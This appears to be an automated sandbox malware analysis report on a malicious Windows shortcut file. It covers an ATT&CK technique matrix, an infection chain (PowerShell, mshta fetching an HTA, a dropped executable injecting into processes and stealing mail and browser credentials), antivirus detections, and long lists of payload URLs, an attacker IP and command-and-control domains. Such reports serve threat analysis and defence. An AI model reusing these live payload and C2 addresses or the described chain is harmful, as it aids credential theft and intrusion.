          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading
          312
          Process Injection
          Security Account Manager41
          Virtualization/Sandbox Evasion
          SMB/Windows Admin Shares1
          Data from Local System
          4
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Deobfuscate/Decode Files or Information
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput Capture14
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Abuse Elevation Control Mechanism
          LSA Secrets2
          File and Directory Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
          Obfuscated Files or Information
          Cached Domain Credentials23
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
          Software Packing
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446727 Sample: Offer Document 24.lnk Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 49 www.joyesi.xyz 2->49 51 www.magmadokum.com 2->51 53 18 other IPs or domains 2->53 67 Snort IDS alert for network traffic 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 Antivirus detection for URL or domain 2->71 75 12 other signatures 2->75 12 powershell.exe 11 2->12         started        15 svchost.exe 1 1 2->15         started        signatures3 73 Performs DNS queries to domains with low reputation 49->73 process4 dnsIp5 91 Windows shortcut file (LNK) starts blacklisted processes 12->91 93 Powershell drops PE file 12->93 18 mshta.exe 16 12->18         started        23 conhost.exe 1 12->23         started        63 127.0.0.1 unknown unknown 15->63 signatures6 process7 dnsIp8 55 20.86.128.223, 49705, 49706, 80 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->55 45 C:\Users\user\AppData\Local\...\room4[1].hta, HTML 18->45 dropped 77 Windows shortcut file (LNK) starts blacklisted processes 18->77 79 Suspicious powershell command line found 18->79 25 powershell.exe 14 17 18->25         started        file9 signatures10 process11 file12 47 C:\Users\user\AppData\Roaming\rooma.exe, PE32 25->47 dropped 28 rooma.exe 25->28         started        31 conhost.exe 25->31         started        process13 signatures14 95 Antivirus detection for dropped file 28->95 97 Multi AV Scanner detection for dropped file 28->97 99 Machine Learning detection for dropped file 28->99 101 Maps a DLL or memory area into another process 28->101 33 TmjHHkXnMrncRmISMzN.exe 28->33 injected process15 signatures16 65 Found direct / indirect Syscall (likely to bypass EDR) 33->65 36 netbtugc.exe 13 33->36         started        process17 signatures18 81 Tries to steal Mail credentials (via file / registry access) 36->81 83 Tries to harvest and steal browser information (history, passwords, etc) 36->83 85 Modifies the context of a thread in another process (thread injection) 36->85 87 2 other signatures 36->87 39 TmjHHkXnMrncRmISMzN.exe 36->39 injected 43 firefox.exe 36->43         started        process19 dnsIp20 57 www.joyesi.xyz 185.237.107.49, 49756, 49757, 49758 UA-WEECOMI-ASUA Ukraine 39->57 59 www.rssnewscast.com 91.195.240.94, 49732, 49733, 49734 SEDO-ASDE Germany 39->59 61 10 other IPs or domains 39->61 89 Found direct / indirect Syscall (likely to bypass EDR) 39->89 signatures21

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          Offer Document 24.lnk29%ReversingLabsShortcut.Trojan.Nukesped
          Offer Document 24.lnk100%AviraLNK/Dldr.Agent.VPUV
          Offer Document 24.lnk100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\rooma.exe100%AviraTR/Crypt.ZPACK.Gen
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\room4[1].hta100%AviraVBS/Dldr.Agent.VPLT
          C:\Users\user\AppData\Roaming\rooma.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\rooma.exe66%ReversingLabsWin32.Trojan.Generic
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://nuget.org/nuget.exe0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
          http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://g.live.com/odclientsettings/ProdV2/C:0%URL Reputationsafe
          https://www.ecosia.org/newtab/0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          https://www.sedo.com/services/parking.php30%URL Reputationsafe
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
          https://g.live.com/odclientsettings/Prod/C:0%URL Reputationsafe
          https://aka.ms/pscore680%URL Reputationsafe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
          https://musee.mobi/vivaldi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi0%Avira URL Cloudsafe
          https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
          http://www.donnavariedades.com/fo8o/?Plm0mn68=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pFBqtQGck9fp1rRtCXud2beKokCA0CIPwH0kByjXVEoJ79g==&kzN4Y=k0xDPL0%Avira URL Cloudsafe
          http://20.86.1H20%Avira URL Cloudsafe
          https://go.microsoft.co90%Avira URL Cloudsafe
          http://20.86.120%Avira URL Cloudsafe
          http://20.86.128.223/room/room4.htaFPS_BROWSER_AP0%Avira URL Cloudsafe
          https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
          http://20.86.128.220%Avira URL Cloudsafe
          https://www.empowermedeco.com/fo8o/?Plm0mn68=mxnR100%Avira URL Cloudmalware
          http://www.3xfootball.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1aOjYc66J7Y/iHKqqtd6zR7stgJ4hm8X7oMbvduFmUyU2g==0%Avira URL Cloudsafe
          http://20.86.128.223/0%Avira URL Cloudsafe
          http://20.86.128.223/room/room4.hta8N0%Avira URL Cloudsafe
          http://www.magmadokum.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKEsqfuFkq5cAQSWi7WA8E0wwXs8UZjiSCj3RZ8cyRYh4cA==100%Avira URL Cloudmalware
          http://www.kasegitai.tokyo/fo8o/?Plm0mn68=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r+KEwUMhhIOLRL5gTEM7bFlULXRyxxVa+trARU9e5ZGGZA==&kzN4Y=k0xDPL100%Avira URL Cloudmalware
          http://20.86.128.223/room/rooma.e0%Avira URL Cloudsafe
          http://20.86.128.223/room/room4.hta...H20%Avira URL Cloudsafe
          http://20.86.128.0%Avira URL Cloudsafe
          http://20.86.128.2230%Avira URL Cloudsafe
          http://20.86.128.223/room/room4.htaLMEMH0%Avira URL Cloudsafe
          https://musee.mobi/vivaldi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi&#43;eKOiJURJRFTZuVmm6gfrwSjnBrSraU/00%Avira URL Cloudsafe
          http://www.joyesi.xyz/fo8o/0%Avira URL Cloudsafe
          http://20.86.128.223/room/room4.htaY0%Avira URL Cloudsafe
          http://www.antonio-vivaldi.mobi/fo8o/0%Avira URL Cloudsafe
          http://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ==0%Avira URL Cloudsafe
          https://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLta0%Avira URL Cloudsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
          http://www.elettrosistemista.zip/fo8o/?kzN4Y=k0xDPL&Plm0mn68=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ==100%Avira URL Cloudmalware
          http://crl.ver)0%Avira URL Cloudsafe
          http://20.86.128.223/room/room4.htao0%Avira URL Cloudsafe
          http://20.80%Avira URL Cloudsafe
          https://github.com/Pester/Pester0%Avira URL Cloudsafe
          https://codepen.io/uzcho_/pens/popular/?grid_type=list0%Avira URL Cloudsafe
          https://codepen.io/uzcho_/pen/eYdmdXw.css0%Avira URL Cloudsafe
          http://20.86.128.223/room/room4.htat0%Avira URL Cloudsafe
          http://www.rssnewscast.com/fo8o/?Plm0mn68=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNup0fu2K1aHG/1RRjejs3ag7ONVYGhhFLwGMDRFljOPFYJw==&kzN4Y=k0xDPL0%Avira URL Cloudsafe
          http://20.86.128.223/room/rooma.exep0%Avira URL Cloudsafe
          http://20.86.0%Avira URL Cloudsafe
          http://20.86.128.223/room/rooma.exe0%Avira URL Cloudsafe
          http://20.86.128.223/room/rooma.0%Avira URL Cloudsafe
          http://20.86.128.223/room0%Avira URL Cloudsafe
          http://20.860%Avira URL Cloudsafe
          http://www.empowermedeco.com/fo8o/100%Avira URL Cloudmalware
          http://20.86.10%Avira URL Cloudsafe
          http://20.86.128.223/ro0%Avira URL Cloudsafe
          http://www.empowermedeco.com/fo8o/?Plm0mn68=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&kzN4Y=k0xDPL100%Avira URL Cloudmalware
          http://20.86.128.223/room/room4.hta$0%Avira URL Cloudsafe
          http://www.magmadokum.com/fo8o/100%Avira URL Cloudmalware
          http://www.660danm.top/fo8o/100%Avira URL Cloudmalware
          https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_0%Avira URL Cloudsafe
          http://20.86.128.223/room/roo0%Avira URL Cloudsafe
          http://20.86.128.223/room/ro0%Avira URL Cloudsafe
          http://www.rssnewscast.com/fo8o/0%Avira URL Cloudsafe
          http://www.kasegitai.tokyo/fo8o/100%Avira URL Cloudmalware
          http://20.86.128.223/room/room4.htaventindowsINetCookiesIO0%Avira URL Cloudsafe
          http://www.660danm.top/fo8o/?kzN4Y=k0xDPL&Plm0mn68=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrOfHwa9C8Q+9ZQoBQJyEcpoFJdl2tDobRnKnc0fEkX8JY0Q==100%Avira URL Cloudmalware
          http://20.86.128.20%Avira URL Cloudsafe
          https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
          http://www.goldenjade-travel.com/fo8o/0%Avira URL Cloudsafe
          http://20.86.128.223/room/room4.hta....=H0%Avira URL Cloudsafe
          http://20.86.128.223/room/room4.htaH0%Avira URL Cloudsafe
          http://www.joyesi.xyz0%Avira URL Cloudsafe
          http://20.86.128.223/room/0%Avira URL Cloudsafe
          https://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&amp;Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prI0%Avira URL Cloudsafe
          http://20.86.128.223/room/room4.hta0%Avira URL Cloudsafe
          http://20.86.128.223/room/room0%Avira URL Cloudsafe
          http://www.elettrosistemista.zip/fo8o/100%Avira URL Cloudmalware
          http://20.86.128.223/r0%Avira URL Cloudsafe
          http://www.antonio-vivaldi.mobi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZdmVZ54UmbyKF16zvv1yGe3hSwRWBn0bZic9A2kho+UJ9gA==&kzN4Y=k0xDPL0%Avira URL Cloudsafe
          http://www.donnavariedades.com/fo8o/0%Avira URL Cloudsafe
          http://20.86.128.223/room/rooma0%Avira URL Cloudsafe
          http://www.joyesi.xyz/fo8o/?kzN4Y=k0xDPL&Plm0mn68=4jpq/azRsxa5RUjY86tNWfjSBjUfGmQA/bC5edk8IUrTRSqWoRPa/8wzulAZuqVnvDzKNkDL1IzsWztH+C0vz/DDu79arRp32UcJsNkv7g6dr0ICiHZvS3tESvUt5oYRbw==0%Avira URL Cloudsafe
          https://donnavariedades.com/fo8o?Plm0mn68=l0%Avira URL Cloudsafe
          http://20.86.128.223/room/r0%Avira URL Cloudsafe
          http://20.86.128.223/room/rooma.ex0%Avira URL Cloudsafe
          http://20.86.128.223/room/room4.htaC:0%Avira URL Cloudsafe
          http://20.86.1280%Avira URL Cloudsafe
          http://20.86.128.223/room/room4.htastricted0%Avira URL Cloudsafe
          http://20.86.128.223/roo0%Avira URL Cloudsafe
          http://20.86.128.223/room/room4.hta4.C:0%Avira URL Cloudsafe
          http://www.techchains.info/fo8o/100%Avira URL Cloudphishing
          http://20.86.128.223/room/room4.hta;H0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.660danm.top
          34.111.148.214
          truefalse
            unknown
            empowermedeco.com
            217.196.55.202
            truefalse
              unknown
              www.joyesi.xyz
              185.237.107.49
              truetrue
                unknown
                shops.myshopify.com
                23.227.38.74
                truefalse
                  unknown
                  natroredirect.natrocdn.com
                  85.159.66.93
                  truefalse
                    unknown
                    www.kasegitai.tokyo
                    202.172.28.202
                    truefalse
                      unknown
                      elettrosistemista.zip
                      195.110.124.133
                      truefalse
                        unknown
                        www.3xfootball.com
                        154.215.72.110
                        truefalse
                          unknown
                          www.shenzhoucui.com
                          104.206.198.212
                          truefalse
                            unknown
                            www.antonio-vivaldi.mobi
                            46.30.213.191
                            truefalse
                              unknown
                              www.goldenjade-travel.com
                              116.50.37.244
                              truefalse
                                unknown
                                www.rssnewscast.com
                                91.195.240.94
                                truefalse
                                  unknown
                                  www.techchains.info
                                  66.29.149.46
                                  truefalse
                                    unknown
                                    www.magmadokum.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.donnavariedades.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.liangyuen528.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.empowermedeco.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.k9vyp11no3.cfd
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.elettrosistemista.zip
                                              unknown
                                              unknowntrue
                                                unknown
                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.donnavariedades.com/fo8o/?Plm0mn68=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pFBqtQGck9fp1rRtCXud2beKokCA0CIPwH0kByjXVEoJ79g==&kzN4Y=k0xDPLfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.3xfootball.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1aOjYc66J7Y/iHKqqtd6zR7stgJ4hm8X7oMbvduFmUyU2g==false
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.kasegitai.tokyo/fo8o/?Plm0mn68=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r+KEwUMhhIOLRL5gTEM7bFlULXRyxxVa+trARU9e5ZGGZA==&kzN4Y=k0xDPLfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.magmadokum.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKEsqfuFkq5cAQSWi7WA8E0wwXs8UZjiSCj3RZ8cyRYh4cA==false
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.joyesi.xyz/fo8o/false
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.antonio-vivaldi.mobi/fo8o/false
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.elettrosistemista.zip/fo8o/?kzN4Y=k0xDPL&Plm0mn68=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ==false
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ==false
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.rssnewscast.com/fo8o/?Plm0mn68=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNup0fu2K1aHG/1RRjejs3ag7ONVYGhhFLwGMDRFljOPFYJw==&kzN4Y=k0xDPLfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/room/rooma.exetrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.empowermedeco.com/fo8o/false
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.empowermedeco.com/fo8o/?Plm0mn68=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&kzN4Y=k0xDPLfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.660danm.top/fo8o/false
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.magmadokum.com/fo8o/false
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.rssnewscast.com/fo8o/false
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.660danm.top/fo8o/?kzN4Y=k0xDPL&Plm0mn68=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrOfHwa9C8Q+9ZQoBQJyEcpoFJdl2tDobRnKnc0fEkX8JY0Q==false
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.kasegitai.tokyo/fo8o/false
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.goldenjade-travel.com/fo8o/false
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/room/room4.htatrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.elettrosistemista.zip/fo8o/false
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.antonio-vivaldi.mobi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZdmVZ54UmbyKF16zvv1yGe3hSwRWBn0bZic9A2kho+UJ9gA==&kzN4Y=k0xDPLfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.donnavariedades.com/fo8o/false
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.joyesi.xyz/fo8o/?kzN4Y=k0xDPL&Plm0mn68=4jpq/azRsxa5RUjY86tNWfjSBjUfGmQA/bC5edk8IUrTRSqWoRPa/8wzulAZuqVnvDzKNkDL1IzsWztH+C0vz/DDu79arRp32UcJsNkv7g6dr0ICiHZvS3tESvUt5oYRbw==false
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.techchains.info/fo8o/false
                                                • Avira URL Cloud: phishing
                                                unknown
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabnetbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.1H2powershell.exe, 00000005.00000002.1443968216.0000021E65BAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://duckduckgo.com/ac/?q=netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.22powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.empowermedeco.com/fo8o/?Plm0mn68=mxnRnetbtugc.exe, 0000000A.00000002.3839549764.0000000004A0A000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000003C8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://20.86.12powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://go.microsoft.co9powershell.exe, 00000005.00000002.1443610984.0000021E63FCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/room/room4.htaFPS_BROWSER_APmshta.exe, 00000003.00000002.1489938203.00000237E1260000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://musee.mobi/vivaldi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWinetbtugc.exe, 0000000A.00000002.3839549764.0000000003D7A000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000002FFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/room/room4.hta8Nmshta.exe, 00000003.00000003.1486769366.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489347883.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E1315000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1456650933.0000021E74180000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://20.86.128.223/room/room4.hta...H2mshta.exe, 00000003.00000003.1487536110.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490295950.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E135D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1443968216.0000021E64111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://20.86.128.223/room/rooma.epowershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223powershell.exe, 00000005.00000002.1443968216.0000021E64339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1443968216.0000021E656CF000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/room/room4.htaLMEMHmshta.exe, 00000003.00000003.1484607386.0000023FE4512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1482542643.0000023FE44E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1483734633.0000023FE44FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1483458080.0000023FE44F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489199159.0000023FE4514000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1443968216.0000021E64339000.00000004.00000800.00020000.00000000.sdmptrue
                                                • URL Reputation: malware
                                                unknown
                                                https://musee.mobi/vivaldi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi&#43;eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0netbtugc.exe, 0000000A.00000002.3839549764.0000000003D7A000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000002FFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1443968216.0000021E64339000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://go.micropowershell.exe, 00000005.00000002.1443968216.0000021E656CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://20.86.128.223/room/room4.htaYmshta.exe, 00000003.00000002.1490037381.00000237E12A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtanetbtugc.exe, 0000000A.00000002.3839549764.0000000003BE8000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000002E68000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://contoso.com/Iconpowershell.exe, 00000005.00000002.1456650933.0000021E74180000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://crl.ver)svchost.exe, 00000008.00000002.3113103128.0000024A08800000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://g.live.com/odclientsettings/ProdV2/C:svchost.exe, 00000008.00000003.1476761679.0000024A08710000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://www.ecosia.org/newtab/netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://20.8powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
